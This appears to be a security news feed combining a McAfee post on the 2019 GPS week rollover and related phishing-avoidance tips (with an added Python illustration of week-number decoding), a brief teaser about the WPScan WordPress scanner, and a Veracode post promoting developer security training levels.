Today, we are extremely reliant on our GPS devices. In fact, we’re so reliant on them that map features are programmed into almost every IoT device we use, as well as into our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.
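As an added illustration of the week-counting arithmetic above (not part of the original post), the following Python models a receiver decoding the 10-bit week field: a naive decoder that simply counts from the GPS epoch of 6 January 1980 jumps back in time when the field wraps from 1023 to 0, while a decoder that uses a reference ("pivot") date, the approach receiver firmware commonly uses to disambiguate the cycle, keeps the date correct. The pivot date of 2015-01-01 is an assumed firmware build date.

```python
from datetime import date, timedelta

# Start of GPS week 0. GPS time runs some leap seconds ahead of UTC, so the
# week boundaries below fall at the very end of the previous UTC day
# (week 1024 starts at the end of 21 August 1999 UTC, week 2048 at the end
# of 6 April 2019 UTC).
GPS_EPOCH = date(1980, 1, 6)
WEEK_MODULUS = 1 << 10  # the broadcast week field is 10 bits: 0..1023


def truncate_week(full_week: int) -> int:
    """What a receiver actually sees: the full week number modulo 1024."""
    return full_week % WEEK_MODULUS


def naive_week_to_date(week10: int) -> str:
    """A decoder with no rollover handling counts from the epoch, so when
    the field wraps from 1023 to 0 the computed date jumps back 1024 weeks."""
    return (GPS_EPOCH + timedelta(weeks=week10)).isoformat()


def pivot_week_to_date(week10: int, pivot_iso: str) -> str:
    """Rollover-aware decoder: pick the 1024-week cycle so that the result
    is never earlier than the pivot date (assumed here to be the firmware
    build date). Stays correct for 1024 weeks after the pivot."""
    pivot_weeks = (date.fromisoformat(pivot_iso) - GPS_EPOCH).days // 7
    cycle_base = pivot_weeks - (pivot_weeks % WEEK_MODULUS)
    full_week = cycle_base + week10
    if full_week < pivot_weeks:  # the field has wrapped since the pivot
        full_week += WEEK_MODULUS
    return (GPS_EPOCH + timedelta(weeks=full_week)).isoformat()


if __name__ == "__main__":
    build_date = "2015-01-01"  # assumed firmware build date
    # Last week before and first week after the 2019 rollover.
    for full in (2047, 2048):
        w = truncate_week(full)
        print(f"week field {w:4d}: naive -> {naive_week_to_date(w)}, "
              f"pivot -> {pivot_week_to_date(w, build_date)}")
```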

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up to date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

Scan WordPress websites for vulnerabilities WPScan Kali Linux

WPScan is a black box vulnerability scanner for WordPress websites. WPScan comes pre-installed in Kali Linux. Kali Linux is a popular Linux distribution built on Debian; it comes with many of the best ethical hacking tools pre-installed. If you’re not using Kali Linux and you […]

The post Scan WordPress websites for vulnerabilities WPScan Kali Linux appeared first on HackingVision.

New eLearning Learner Levels Streamline Verified Progress

Before customers buy from you, they ask “Can you prove that your application is secure, and that you will protect our data if we give it to you?” Companies around the world struggle to answer this question, especially with the advancement of DevOps and rapid changes/deployment of applications into production. As such, we launched Verified to help you prove to your customers that you adopt security best practices for your applications and the developers that support them on an ongoing basis.

Veracode Verified is a three-tier maturity program that includes several training elements. For example, to reach the Verified Team tier, one requirement is to select and train a security champion. A requirement to reach Verified Continuous is to roll out security fundamentals training to all developers working on an application.

Veracode Introduces Learning Levels

In order to help companies track the maturity of their eLearning program and their progress toward Verified tiers, Veracode launched learning levels in the eLearning product. The new enhancement to eLearning includes the following:

Learning Levels: There are three levels that individuals can reach within the platform. Each level has a requirement in terms of specific courses a user must complete in order to obtain that level.

Level 1 – Developer Security Fundamentals

Level 2 – Verified Team Security Champion

Level 3 – Verified Continuous Security Champion

Visit our website for more details on developer training.

Platform Badges: There are now badges next to user names that align to the level the user has reached. This allows managers to quickly identify that their teams have met their policy requirements for eLearning.

Certificate: Users can also download a certificate that shows their name, the level they reached, and the date they achieved their status.

Reporting: Managers can download a report for their teams on the levels they achieved, and the date it was achieved.

A Variety of Developer Training that Meets Your Specific Needs

With the increased speed of development, plus security shifting “left,” developers need to catch security-related defects on their own as often as possible. However, most developers have had no opportunities to learn secure coding, in school or on the job. Veracode offers application security leaders the chance to engage developers with various types of training, from self-service eLearning to fully customizable on-site workshops.

Learn more about proving the security of your development process with our Verified program, and the different training elements needed to become Verified.